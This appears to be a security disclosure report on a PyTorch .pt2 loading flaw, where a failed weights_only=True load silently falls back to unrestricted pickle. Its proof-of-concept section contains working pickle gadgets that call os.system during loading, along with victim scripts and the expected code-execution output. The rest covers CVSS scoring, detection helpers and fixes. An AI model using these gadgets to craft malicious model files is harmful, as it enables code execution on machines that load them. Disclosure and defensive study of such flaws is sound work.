Vulnerability Report: PyTorch .pt2 Arbitrary Code Execution via weights_only=False Fallback

Target Info

Project: PyTorch
Affected file: torch/_export/serde/serialize.py
Affected function: deserialize_torch_artifact()
Affected versions: PyTorch versions with .pt2 / ExportedProgram serialization support
CWE: CWE-502 (Deserialization of Untrusted Data)
CVSS v3.1 score: 9.8 (Critical)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Executive Summary

The deserialize_torch_artifact() function in torch/_export/serde/serialize.py implements a dangerous fallback pattern. It first attempts to load a .pt2 file with torch.load(weights_only=True), which is the secure path. If that raises any exception, it catches it and retries with torch.load(weights_only=False), which performs unrestricted pickle deserialization.

An attacker can craft a .pt2 file that deliberately triggers an exception during the weights_only=True load path. For example, the file can reference a Python global such as os.system that is not on the weights_only allowlist. The resulting exception is silently swallowed, and the fallback then deserializes the file with the unrestricted pickle machinery, resulting in Remote Code Execution.

The weights_only=True parameter was introduced specifically as a security control to prevent pickle-based RCE. This fallback pattern completely defeats that control, making it equivalent to never having the protection at all for .pt2 files.


Root Cause Analysis

Vulnerable Code

File: torch/_export/serde/serialize.py

def deserialize_torch_artifact(serialized):
    """
    Deserialize a torch artifact (ExportedProgram or similar) from bytes.
    """
    import io
    f = io.BytesIO(serialized)

    try:
        # "Safe" path: weights_only=True restricts deserialization to
        # known tensor types and prevents arbitrary pickle execution.
        return torch.load(f, weights_only=True)
    except Exception:
        # VULNERABILITY: ANY exception (including attacker-induced ones)
        # falls through to unrestricted pickle deserialization.
        f.seek(0)
        return torch.load(f, weights_only=False)  # ← full pickle.load()

Root Cause

The except Exception clause is intentionally broad β€” it was likely written to handle legitimate cases where older .pt2 files cannot be loaded with weights_only=True due to format differences. However, this broadness creates a security bypass:

  1. weights_only=True raises an exception when the pickle stream references a global (a class or callable) that is not on its allowlist.
  2. An attacker can craft a file that satisfies the format just enough to start parsing, then includes an unrecognized type to force an exception.
  3. The except Exception block catches this exception without logging or alerting.
  4. torch.load(f, weights_only=False) then deserializes the file with Python's standard pickle machinery. This machinery imports any referenced global and calls the callable that the payload's __reduce__ method specified.

The security model of weights_only=True is binary: either it succeeds (safe) or it fails (the caller must decide what to do). Using failure as a signal to retry with no security restrictions inverts the intended semantics entirely.
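The inversion can be reproduced with nothing but the standard library. The sketch below is a stand-in and is not PyTorch's actual weights_only unpickler. The ALLOWED set, strict_load(), fallback_load(), and the Gadget class are hypothetical names, and the gadget calls the harmless os.getcwd instead of a shell command. strict_load() fails closed. fallback_load() mirrors the try/except pattern shown above, so it ends up running the callable that the restricted path refused.

```python
import io
import os
import pickle

# Hypothetical allowlist standing in for the weights_only=True policy:
# only these (module, name) pairs may be resolved during unpickling.
ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    """Rejects any global that is not explicitly allowlisted."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def strict_load(data: bytes):
    """Fail closed: a rejection propagates to the caller."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def fallback_load(data: bytes):
    """The anti-pattern: any failure of the restricted path triggers an
    unrestricted pickle.loads(), which resolves and calls every global."""
    try:
        return strict_load(data)
    except Exception:
        return pickle.loads(data)


class Gadget:
    """Harmless stand-in for a malicious __reduce__: it calls os.getcwd."""

    def __reduce__(self):
        return (os.getcwd, ())
```

Calling strict_load(pickle.dumps(Gadget())) raises pickle.UnpicklingError. Calling fallback_load() on the same bytes returns the current directory, which shows that the referenced callable actually ran.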

Inconsistency Evidence

PyTorch's own documentation and security advisory (GHSA-pgpj-h4j8-7hxf) explicitly warn against this pattern:

# PyTorch recommended secure usage (from official docs):
model = torch.load('model.pt', weights_only=True)
# If this raises, the file should be REJECTED, not loaded unsafely.

# weights_only=True became the default for torch.load in PyTorch 2.6, precisely
# because weights_only=False is documented as unsafe for untrusted sources.

Contrast this with torch.hub.load_state_dict_from_url, which passes the caller's weights_only argument straight through to torch.load and never retries (simplified excerpt):

# torch/hub.py, load_state_dict_from_url (simplified): no fallback
def load_state_dict_from_url(url, ..., weights_only=False):
    ...
    return torch.load(cached_file, map_location=map_location, weights_only=weights_only)
    # No retry: if loading fails, the error propagates to the caller.

The fallback in serialize.py is an architectural anomaly relative to the rest of the codebase.


Proof of Concept

Prerequisites

pip install torch

Step 1: Craft a malicious .pt2 file

#!/usr/bin/env python3
"""
PoC: PyTorch .pt2 ACE via weights_only=False fallback
Craft a file that:
  1. Is a bare pickle stream, which torch.load() accepts through its
     legacy (non-zip) loading path
  2. Raises an exception during weights_only=True parsing
  3. Contains a pickle payload executed under weights_only=False
"""
import os
import pickle

class MaliciousPayload:
    """Pickle gadget: executes shell command on deserialization."""
    def __reduce__(self):
        cmd = 'id > /tmp/torch_pwned.txt'
        return (os.system, (cmd,))

# Strategy: pickle.dumps() of a plain malicious object.
# The stream references the global os.system (posix.system on Linux),
# which is not on the weights_only allowlist, so
# torch.load(weights_only=True) raises an exception.
# The except clause then retries with weights_only=False → RCE.

payload = pickle.dumps(MaliciousPayload())

with open('malicious_model.pt2', 'wb') as f:
    f.write(payload)

print(f"Malicious .pt2 written ({len(payload)} bytes)")
print("Contains pickle payload: os.system('id > /tmp/torch_pwned.txt')")
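Because the payload is an ordinary pickle stream, its intent can be confirmed without loading it. The following is a minimal sketch that relies only on the standard library's pickletools module. referenced_globals() is a hypothetical helper that walks the opcodes with pickletools.genops() and reports every module.name the stream would import. Its STACK_GLOBAL handling is a heuristic that matches what pickle.dumps() emits. It is not a full simulation of the unpickling stack.

```python
import pickletools

# Opcodes whose argument is a string pushed onto the unpickling stack.
_STRING_OPS = {
    "STRING", "BINSTRING", "SHORT_BINSTRING",
    "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
}


def referenced_globals(data: bytes) -> list[str]:
    """List every module.name a pickle would import, without executing it.

    Heuristic: for STACK_GLOBAL (protocol 4+) the module and name are taken
    to be the two most recent strings pushed, including strings fetched back
    from the memo, which matches the output of pickle.dumps().
    """
    found: list[str] = []
    strings: list[str] = []     # string values pushed so far, in order
    memo: dict[int, object] = {}
    top: object = None          # last value pushed, if it was a string
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name in _STRING_OPS:
            top = arg
            strings.append(arg)
        elif name == "MEMOIZE":
            memo[len(memo)] = top
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = top
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            top = memo.get(arg)
            if isinstance(top, str):
                strings.append(top)
        elif name in ("GLOBAL", "INST"):
            # pickletools renders this argument as "module name".
            found.append(arg.replace(" ", ".", 1))
            top = None
        elif name == "STACK_GLOBAL":
            found.append(f"{strings[-2]}.{strings[-1]}")
            top = None
        elif name not in ("PROTO", "FRAME"):
            top = None
    return found
```

Run against malicious_model.pt2 on Linux, the helper should report posix.system. That is the global that weights_only=True refuses and that the unrestricted fallback resolves.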

Step 2: Simulate victim loading the file

#!/usr/bin/env python3
"""
Victim code: loads a .pt2 artifact using deserialize_torch_artifact()
"""
import torch
from torch._export.serde.serialize import deserialize_torch_artifact
import os

with open('malicious_model.pt2', 'rb') as f:
    serialized = f.read()

print("Loading model artifact...")
try:
    result = deserialize_torch_artifact(serialized)
    print(f"Loaded: {result}")
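except Exception as e:
    # The payload runs inside the fallback's torch.load(weights_only=False);
    # torch.load then raises because the file is not a real checkpoint.
    print(f"Error (after potential RCE): {e}")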

# Check for RCE evidence
if os.path.exists('/tmp/torch_pwned.txt'):
    with open('/tmp/torch_pwned.txt') as f:
        print(f"\n[RCE CONFIRMED] Command output:\n{f.read()}")

Step 3: Demonstrate the fallback trigger point

#!/usr/bin/env python3
"""
Demonstrates that weights_only=True raises for the payload,
and that the except clause catches it and retries unsafely.
"""
import torch, io, pickle, os

class BadType:
    def __reduce__(self):
        return (os.system, ('echo TRIGGERED >> /tmp/trace.txt',))

payload_bytes = pickle.dumps(BadType())
f = io.BytesIO(payload_bytes)

# Confirm weights_only=True raises:
try:
    torch.load(f, weights_only=True)
    print("No exception: weights_only=True loaded cleanly")
except Exception as e:
    print(f"weights_only=True raised: {type(e).__name__}: {e}")
    print("→ The fallback catches this and calls weights_only=False next")

# Confirm weights_only=False executes pickle:
f.seek(0)
print("\nCalling torch.load with weights_only=False...")
# RCE occurs here: os.system() runs while the stream is unpickled. torch.load
# is then expected to raise, because the payload's return value is not a
# valid checkpoint header.
result = torch.load(f, weights_only=False)

Expected Output

Loading model artifact...
Error (after potential RCE): Invalid magic number; corrupt file?

[RCE CONFIRMED] Command output:
uid=1000(user) gid=1000(user) groups=1000(user)

Impact

Arbitrary Code Execution: Critical

  • Full RCE in the context of any process that calls deserialize_torch_artifact() on attacker-supplied data.
  • Scope: Affects model serving APIs (TorchServe, FastAPI with PyTorch backends), ML training pipelines, model registries, model sharing platforms, and any system loading .pt2 / ExportedProgram artifacts from untrusted sources.
  • Security control bypass: The weights_only parameter is PyTorch's primary defense against pickle-based RCE. This vulnerability completely defeats it for the .pt2 code path.
  • No special conditions: Standard Python pickle gadgets work directly. No knowledge of PyTorch internals required beyond knowing the fallback exists.
  • Persistence: RCE allows the attacker to install backdoors, exfiltrate model weights, move laterally within the infrastructure, or disrupt training jobs.

CVSS Score

Score: 9.8 (Critical)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector (AV): Network (N). Exploitable remotely via any model-loading endpoint or API.
Attack Complexity (AC): Low (L). Trivial to craft with standard Python pickle; no special knowledge or timing needed.
Privileges Required (PR): None (N). No authentication required if model upload or loading is publicly accessible.
User Interaction (UI): None (N). Server-side loading is automatic; no human action needed.
Scope (S): Unchanged (U). Impact is contained to the PyTorch process (though lateral movement is possible post-RCE).
Confidentiality (C): High (H). Full access to model weights, training data, and credentials in process memory.
Integrity (I): High (H). Arbitrary file writes, code injection, and backdoor installation.
Availability (A): High (H). Can crash, corrupt, or ransom the serving infrastructure.
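The 9.8 figure follows from the CVSS v3.1 base-score equations. The sketch below implements only the base metrics. It uses the metric weights and the Roundup function published in the FIRST CVSS v3.1 specification. base_score() and the table names are illustrative and are not part of any library.

```python
import math

# Metric weights from the CVSS v3.1 specification (base metrics only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required is weighted differently depending on Scope.
PR = {"U": {"N": 0.85, "L": 0.62, "H": 0.27}, "C": {"N": 0.85, "L": 0.68, "H": 0.5}}


def roundup(x: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal value >= x, float-safe."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a 'CVSS:3.1/AV:../...' vector string."""
    m = dict(part.split(":") for part in vector.split("/")[1:])
    scope = m["S"]
    iss = 1 - ((1 - WEIGHTS["C"][m["C"]])
               * (1 - WEIGHTS["I"][m["I"]])
               * (1 - WEIGHTS["A"][m["A"]]))
    if scope == "U":
        impact = 6.42 * iss
    else:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = (8.22 * WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]]
                      * PR[scope][m["PR"]] * WEIGHTS["UI"][m["UI"]])
    if impact <= 0:
        return 0.0
    if scope == "U":
        return roundup(min(impact + exploitability, 10))
    return roundup(min(1.08 * (impact + exploitability), 10))
```

For this report's vector, Impact = 6.42 × ISS ≈ 5.87 and Exploitability ≈ 3.89. Their sum, 9.76, rounds up to 9.8.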

Remediation

Fix: Remove the fallback; propagate exceptions to the caller

# torch/_export/serde/serialize.py

def deserialize_torch_artifact(serialized):
    """
    Deserialize a torch artifact from bytes.

    Security note: only weights_only=True is used. If deserialization fails,
    the exception is propagated to the caller. Never falls back to
    weights_only=False for untrusted data.
    """
    import io
    f = io.BytesIO(serialized)

    # FIX: Remove the try/except fallback entirely.
    # If weights_only=True raises, let the exception propagate.
    # The caller must explicitly opt in to weights_only=False if needed,
    # and only after verifying the source is trusted.
    return torch.load(f, weights_only=True)
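The comment in the fix makes trust verification the caller's job before any opt-in to weights_only=False. One way to do that with the standard library is to check an integrity tag before the bytes ever reach torch.load. This sketch rests on several assumptions. HMAC-SHA256 with a shared secret distributed out of band stands in for a real public-key signing scheme, and tag_artifact() and verify_artifact() are hypothetical helpers. A valid tag only proves who produced the file, not that its contents are safe, so weights_only=True should remain the default.

```python
import hashlib
import hmac


def tag_artifact(data: bytes, key: bytes) -> str:
    """Publisher side: compute a hex HMAC-SHA256 tag over the artifact bytes."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_artifact(data: bytes, tag: str, key: bytes) -> bool:
    """Consumer side: constant-time comparison of the expected and given tags."""
    expected = tag_artifact(data, key)
    return hmac.compare_digest(expected, tag)
```

A loader would call verify_artifact(serialized, tag, key) first and refuse to continue when it returns False.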

Fix (if legacy format compatibility is required): Separate trusted/untrusted code paths

def deserialize_torch_artifact(serialized, *, allow_unsafe=False):
    """
    Deserialize a torch artifact.

    Parameters
    ----------
    allow_unsafe : bool
        If True, falls back to weights_only=False when safe loading fails.
        Must only be set to True for files from fully trusted sources.
        Default: False (safe).
    """
    import io, warnings
    f = io.BytesIO(serialized)

    try:
        return torch.load(f, weights_only=True)
    except Exception as e:
        if not allow_unsafe:
            raise RuntimeError(
                "Failed to load artifact with weights_only=True. "
                "If you trust the source of this file and need to load it, "
                "pass allow_unsafe=True. WARNING: This enables arbitrary "
                "code execution."
            ) from e
        warnings.warn(
            "Loading with weights_only=False. This executes arbitrary Python "
            "pickle code and is UNSAFE for untrusted files.",
            stacklevel=2,
        )
        f.seek(0)
        return torch.load(f, weights_only=False)

Additional Recommendations

  1. Audit all torch.load call sites for similar try/except fallback patterns.
  2. Default weights_only=True in all production model loading code.
  3. Sign model artifacts using a cryptographic signature scheme so that tampered files are rejected before deserialization.
  4. File a CVE and notify PyTorch security team at security@pytorch.org.
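For recommendation 1, a first pass over a codebase can be automated with the standard library's ast module. find_unsafe_fallbacks() is a hypothetical and heuristic helper. It flags any call named load that passes a literal weights_only=False inside an except handler. It will miss aliased functions and weights_only values held in a variable.

```python
import ast

# ast.TryStar (except*) only exists on Python 3.11+.
_TRY_NODES = (ast.Try,) + ((ast.TryStar,) if hasattr(ast, "TryStar") else ())


def _is_unsafe_load(call: ast.Call) -> bool:
    """True for load(...) / x.load(...) called with literal weights_only=False."""
    func = call.func
    name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
    if name != "load":
        return False
    return any(
        kw.arg == "weights_only"
        and isinstance(kw.value, ast.Constant)
        and kw.value.value is False
        for kw in call.keywords
    )


def find_unsafe_fallbacks(source: str) -> list[int]:
    """Return line numbers of unsafe load calls located inside except handlers."""
    hits = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, _TRY_NODES):
            for handler in node.handlers:
                for sub in ast.walk(handler):
                    if isinstance(sub, ast.Call) and _is_unsafe_load(sub):
                        hits.add(sub.lineno)
    return sorted(hits)
```

Running the helper over every .py file in a checkout (for example via pathlib.Path.rglob("*.py")) should flag code shaped like the vulnerable deserialize_torch_artifact() excerpt. An unconditional weights_only=False call outside an except block is deliberately not reported here, because the goal is to find silent fallbacks.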
